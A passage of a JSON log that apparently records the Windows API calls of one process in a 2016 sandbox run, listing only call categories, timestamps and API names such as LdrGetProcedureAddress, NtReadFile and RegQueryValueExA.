"2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "VirtualProtectEx"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "VirtualProtectEx"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "NtFreeVirtualMemory"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": 
"2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", 
"timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 
17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", 
"timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,213", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrLoadDll"}, 
{"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:35,223", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,223", "api": "LdrGetDllHandle"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,223", "api": "NtQueryInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,223", "api": "NtCreateSection"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:35,223", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,233", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,233", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,233", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", 
"timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,293", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": 
"RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,293", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtReadFile"}, {"category": "misc", "timestamp": "2016-02-16 17:41:35,303", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": 
